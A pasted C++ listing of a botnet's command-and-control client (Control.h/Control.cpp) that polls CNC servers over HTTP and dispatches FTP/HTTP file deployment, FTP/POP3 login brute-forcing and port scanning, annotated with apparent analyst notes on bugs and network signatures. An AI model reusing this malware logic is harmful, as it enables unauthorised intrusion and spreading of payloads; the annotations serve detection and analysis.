
Untitled

a guest
Jun 7th, 2017
  1. Control.H.
  2.  
  3. #ifndef CONTROL_H
  4. #define CONTROL_H
  5.  
  6. #include "includes.h"
  7.  
  // Worker derived from ThreadClass (declared elsewhere) that holds the state of
  // the bot's control channel: the configured command-server list, the socket
  // in use, the last raw server response and the command lines parsed from it.
  // Analyst note: this class is the client side of a command-and-control loop;
  // the definitions in Control.cpp show one connect / fetch / parse / dispatch
  // pass per call to run().
  class ControlProcClass: public ThreadClass
  {

  public:

      ControlProcClass();
      ~ControlProcClass();

      // One full pass: connect, fetch, parse, dispatch.
      void run();
      // Opens a TCP connection to one server; returns 0 on success, 2 on failure.
      int ConnectToServer(string hostname, int port);
      // Walks the configured server list until one connection succeeds.
      int ConnectToServers();
      // Sends the HTTP GET for /control.php and stores the reply in Received.
      int GetCommands();
      // Extracts the lines between the START and END markers into `commands`.
      int ResolveCommands();
      // Dispatches each stored command line on its numeric code.
      int ExecuteCommands();
      // Reconnects, then returns the socket handle as an int.
      int returnSock();

      // Raw text of the last server response; public, so other code can read
      // or overwrite it.
      string Received;

  private:

      // Server list; hostnames[i] is paired with ports[i] by index.
      vector <string> hostnames;
      vector <int> ports;

      // Logger handle obtained from DebugLog::initialize().
      DebugLog * Log;

      // Host and port of the most recently attempted server.
      string Hostname;
      int port;

      // Socket of the current or last connection attempt.
      SOCKET sock;

      // Command lines collected by ResolveCommands().
      vector<string> commands;

      // Not referenced by any definition visible in this listing.
      int nHostnames;

  };
  43.  
  44. #endif
  45.  
  46. ==================================================
  47. Control.cpp
  48. #include "includes.h"
  49.  
  50.  
  // Builds the command-server list from two comma-separated constants,
  // CNC_SERVER_HOSTNAMES and CNC_SERVER_PORTS (defined outside this listing,
  // presumably via includes.h).
  // Analyst note: the server list is fixed at build time, so those two
  // constants are where the network indicators for a given sample live.
  // sock, port and nHostnames are not initialised here.
  ControlProcClass::ControlProcClass()
  {
      Log = DebugLog::initialize();
      // The log text says "CommandProcClass" although the class is ControlProcClass.
      Log->writeLog(400, __LINE__, __FILE__, "Creating CommandProcClass");
      string buffer;
      vector <string> tokens;
      buffer = CNC_SERVER_HOSTNAMES;
      SplitString(buffer, hostnames, ",");
      buffer = CNC_SERVER_PORTS;
      SplitString(buffer, tokens, ",");
      // atoi() yields 0 for a non-numeric field, so a malformed port entry
      // becomes port 0 rather than an error. Nothing here checks that the
      // number of ports matches the number of hostnames.
      for (int i = 0; i != tokens.size(); i++)
      {
          ports.push_back(atoi(tokens[i].c_str()));
      }
      Log->writeLog(400, __LINE__, __FILE__, "Set Control Variables");
  }
  67.  
  // Destructor: writes a log entry only. The socket held in `sock` is not
  // closed here.
  ControlProcClass::~ControlProcClass()
  {
      Log->writeLog(400, __LINE__, __FILE__, "Destroying ControlClass");
  }
  72.  
  // Runs the connection routine again and returns the resulting socket handle.
  // The handle is returned whether or not a connection succeeded, because the
  // result of ConnectToServers() is discarded. The SOCKET value is narrowed to
  // int by the return type; whether that loses bits depends on how SOCKET is
  // defined on the build target.
  int ControlProcClass::returnSock()
  {
      ConnectToServers();
      return sock;
  }
  78.  
  // Thread body: one pass of connect -> fetch -> parse -> dispatch. There is no
  // loop or delay here, so any repetition must come from the caller (not shown).
  void ControlProcClass::run()
  {
      Log = DebugLog::initialize();
      Log->writeLog(400, __LINE__, __FILE__, "Starting command collection routine");
      Log->writeLog(400, __LINE__, __FILE__, "Connecting to Command Servers");

      // Empty branch: ConnectToServers() as written always returns 0, so this
      // condition is never true and a failed connection is not handled.
      if ((ConnectToServers()) == 1)
      {

      }

      // The three stages run unconditionally and their return values are ignored.
      GetCommands();

      ResolveCommands();

      ExecuteCommands();

      Log->writeLog(400, __LINE__, __FILE__, "Command collection routing completed");

  }
  99.  
  // Tries each configured server in list order and stops at the first attempt
  // that does not return the failure code 2. Always returns 0.
  // Analyst note: the servers are tried in order with no visible delay, so a
  // host whose first server is unreachable produces back-to-back outbound TCP
  // attempts to every (hostname, port) pair that follows it in the list.
  int ControlProcClass::ConnectToServers()
  {

      int result = 2;
      for (int i = 0; i != hostnames.size(); i++)
      {

          // ports is indexed with the hostnames index; nothing visible
          // guarantees that both vectors have the same length.
          result = ConnectToServer(hostnames[i], ports[i]);
          Hostname = hostnames[i];
          port = ports[i];
          if (result != 2)
          {
              break;
          }
          // Reached only after a failed attempt, although the text reads as
          // if the attempt were about to start. The message has no space
          // before "on".
          Log->writeLog(400, __LINE__, __FILE__,"Attempting connection to server - " + Hostname + "on TCP port " + IntToString(port));
      }
      // Logged even when every attempt failed or the list was empty.
      Log->writeLog(400, __LINE__, __FILE__,"Connected to Command Server - " + Hostname + "on TCP port " + IntToString(port));
      return 0;

  }
  120.  
  // Opens a plain IPv4 TCP connection to hostname:port and stores the handle in
  // the member `sock`. Returns 0 on success and 2 on any failure.
  // The parameter `port` shadows the member of the same name.
  int ControlProcClass::ConnectToServer(string hostname, int port)
  {

      int error;
      string buffer;
      struct sockaddr_in sin;
      // The member is overwritten on every call; a handle left over from an
      // earlier attempt is not closed first.
      sock = socket(AF_INET, SOCK_STREAM, 0);
      if (sock == INVALID_SOCKET)
      {
          // The log text says "WSAError" but the value comes from GetLastError().
          error = GetLastError();
          buffer = "Socket Function, WSAError: " + IntToString(error);
          Log->writeLog(200, __LINE__, __FILE__, buffer);
          return 2;
      }
      memset( &sin, 0, sizeof(sin) );
      // GetHostname() is a project helper (not shown); its result is used
      // directly as the IPv4 address and is not checked for failure.
      sin.sin_addr.s_addr = GetHostname(hostname);
      sin.sin_family = AF_INET;
      sin.sin_port = htons(port);
      if (connect(sock, (sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR)
      {
          // The socket is left open on this failure path.
          error = GetLastError();
          buffer = "Connect Function, WSAError: " + IntToString(error);
          Log->writeLog(200, __LINE__, __FILE__, buffer);
          return 2;
      }
      // Repeats the check made right after socket(); `sock` has not been
      // reassigned in between, so this branch cannot be taken.
      if (sock == INVALID_SOCKET)
      {
          error = GetLastError();
          buffer = "INVALID_SOCKET error, WSAError: " + IntToString(error);
          Log->writeLog(200, __LINE__, __FILE__, buffer);
          return 2;
      }
      // Disabled code kept by the author: an inline request for
      // /control.php?id=1 with a check for a 404 reply.
      /* string Request = "GET /control.php?id=1 HTTP/1.1\r\nHost:"+Hostname+" \r\nUser-Agent:Mozilla/4.0\r\n\r\n";
      send(sock, Request.c_str(), Request.size(), 0);
      char recvbuffer[4024];
      recv(sock, recvbuffer, 4024, 0);
      Received = recvbuffer;
      vector<string> tokens;
      SplitString(Received, tokens, "\n");
      if (tokens[0].find("HTTP/1.1 404 Not Found") != string.npos)
      {
      Log->writeLog(200, __LINE__, __FILE__, "404 Error");
      return 2;
      }*/
      return 0;
  }
  167.  
  // Polls the connected server with a hand-built HTTP/1.1 GET for
  // /control.php?id=<machine id> and stores the reply in Received.
  // Always returns 0.
  // Analyst note: apart from the id value and the host name, the request text
  // is constant: a "Host:" header with no space after the colon and a trailing
  // space before CRLF, and "User-Agent:Mozilla/4.0" as the only other header.
  // That fixed shape is usable as a network signature. The request goes over
  // the raw TCP socket; no TLS is visible in this listing.
  int ControlProcClass::GetCommands()
  {

      // ReturnMachineID() is a project helper (not shown); its value is placed
      // in the query string as-is.
      string MachineID = ReturnMachineID();
      string Request = "GET /control.php?id="+MachineID+" HTTP/1.1\r\nHost:"+Hostname+" \r\nUser-Agent:Mozilla/4.0\r\n\r\n";
      send(sock, Request.c_str(), Request.size(), 0);
      char buffer[4024];
      // A single recv() whose return value is discarded: only the first chunk
      // of the reply is read, and the buffer is neither zeroed nor terminated
      // before it is converted to a string, so Received can contain stack
      // bytes beyond the received data.
      recv(sock, buffer, 4024, 0);
      Received = buffer;
      return 0;

  }
  180.  
  // Splits the stored response on "\n" and appends every line found between a
  // line containing "START" and a line containing "END" to `commands`.
  // Always returns 0.
  // Analyst note: the tasking format is line-oriented plain text framed by
  // START / END markers. Lines before the first START, which would include the
  // HTTP status line and headers, are skipped.
  int ControlProcClass::ResolveCommands()
  {

      Log->writeLog(400, __LINE__, __FILE__, "Splitting command string into an array");
      vector<string> tokens;
      SplitString(Received, tokens, "\n");
      int nCommands = 0;
      // 1 while inside a START..END section, 0 otherwise.
      int sCommands = 0;
      for (int i = 0; i < tokens.size(); i++)
      {
          // Both markers are substring matches, and END is tested first, so
          // any line that contains "END" closes the section instead of being
          // stored as a command.
          if (tokens[i].find("END") != string::npos)
          {
              sCommands = 0;
          }
          else if (sCommands == 1)
          {
              nCommands++;
              // `commands` is appended to and is not cleared anywhere in
              // this listing, so entries accumulate across calls.
              commands.push_back(tokens[i]);
              // Every received command line is written to the debug log.
              Log->writeLog(400, __LINE__, __FILE__, "Found Command "+tokens[i]);
          }
          else if (tokens[i].find("START") != string::npos)
          {
              sCommands = 1;
          }
      }
      Log->writeLog(400, __LINE__, __FILE__, "Received "+IntToString(nCommands)+" commands from control server");
      return 0;

  }
  210.  
  // Dispatches every stored command line. Each line is split on ";" and the
  // first field is matched, by substring, against four numeric codes:
  //   111  deploy via FTP   (host; file; user; password, port fixed at 21)
  //   112  deploy via HTTP  (url)
  //   201  brute            (host; two numeric fields; protocol 21 or 110)
  //   202  scan             (ip address)
  // Always returns 0.
  // Analyst note: these codes and field layouts describe the tasking protocol
  // and can be used to decode captured server responses. The worker classes
  // (DeployClass, BruteClass, PortsClass) are defined outside this listing.
  int ControlProcClass::ExecuteCommands()
  {

      // Declared outside the loop and never cleared here. If SplitString()
      // appends rather than replaces (not shown, to be confirmed), tokens[0]
      // would stay the first command's code on every iteration.
      vector<string> tokens;
      for (int i = 0; i != commands.size(); i++)
      {
          SplitString(commands[i], tokens, ";");
          //
          // "DEPLOY via FTP" command
          //
          // tokens[0] and the later fields are read without checking how many
          // fields the line produced.
          Log->writeLog(400, __LINE__, __FILE__, "Tokens: "+tokens[0]);
          // The four tests are independent `if`s on a substring match, so a
          // first field containing more than one code enters more than one
          // branch.
          if (tokens[0].find("111") != string::npos)
          {
              string hostname = tokens[1];
              string filename = tokens[2];
              string username = tokens[3];
              string password = tokens[4];
              // Local object; what Start() does and whether it outlives this
              // scope is not visible here.
              DeployClass DeployFTP;
              DeployFTP.setFTP(hostname, 21, username, password, filename);
              DeployFTP.Start("DEPLOY_FTP");
          }
          //
          // "DEPLOY via HTTP" command
          //
          if (tokens[0].find("112") != string::npos)
          {
              string url = tokens[1];
              DeployClass DeployHTTP;
              DeployHTTP.setHTTP(url);
              DeployHTTP.Start("DEPLOY_HTTP");
          }
          // "BRUTE" command
          if (tokens[0].find("201") != string::npos)
          {
              string hostname = tokens[1];
              string usernames = tokens[2];
              string passwords = tokens[3];
              string protocol = tokens[4];
              BruteClass Brute;
              Brute.setIPAddress(hostname);
              // Only 21 and 110 are recognised; for any other value
              // setProtocol() is not called.
              if (protocol.find("21") != string::npos)
              {
                  Brute.setProtocol(21);
              }
              else if (protocol.find("110") != string::npos)
              {
                  Brute.setProtocol(110);
              }
              // Both fields are passed as integers; what the numbers mean to
              // BruteClass is not shown here.
              Brute.setUserPass(atoi(usernames.c_str()), atoi(passwords.c_str()));
              Brute.Start("BRUTE");
          }
          // "SCAN" command
          if (tokens[0].find("202") != string::npos)
          {
              string ipaddress = tokens[1];
              // tokens[1] came from a split on ";" already, so this second
              // split presumably returns it unchanged.
              vector <string> tokenss;
              SplitString(ipaddress, tokenss, ";");
              ipaddress = tokenss[0];
              PortsClass Ports;
              Ports.setIPAddress(ipaddress);
              Ports.Start("SCAN");
          }
      }
      return 0;
  }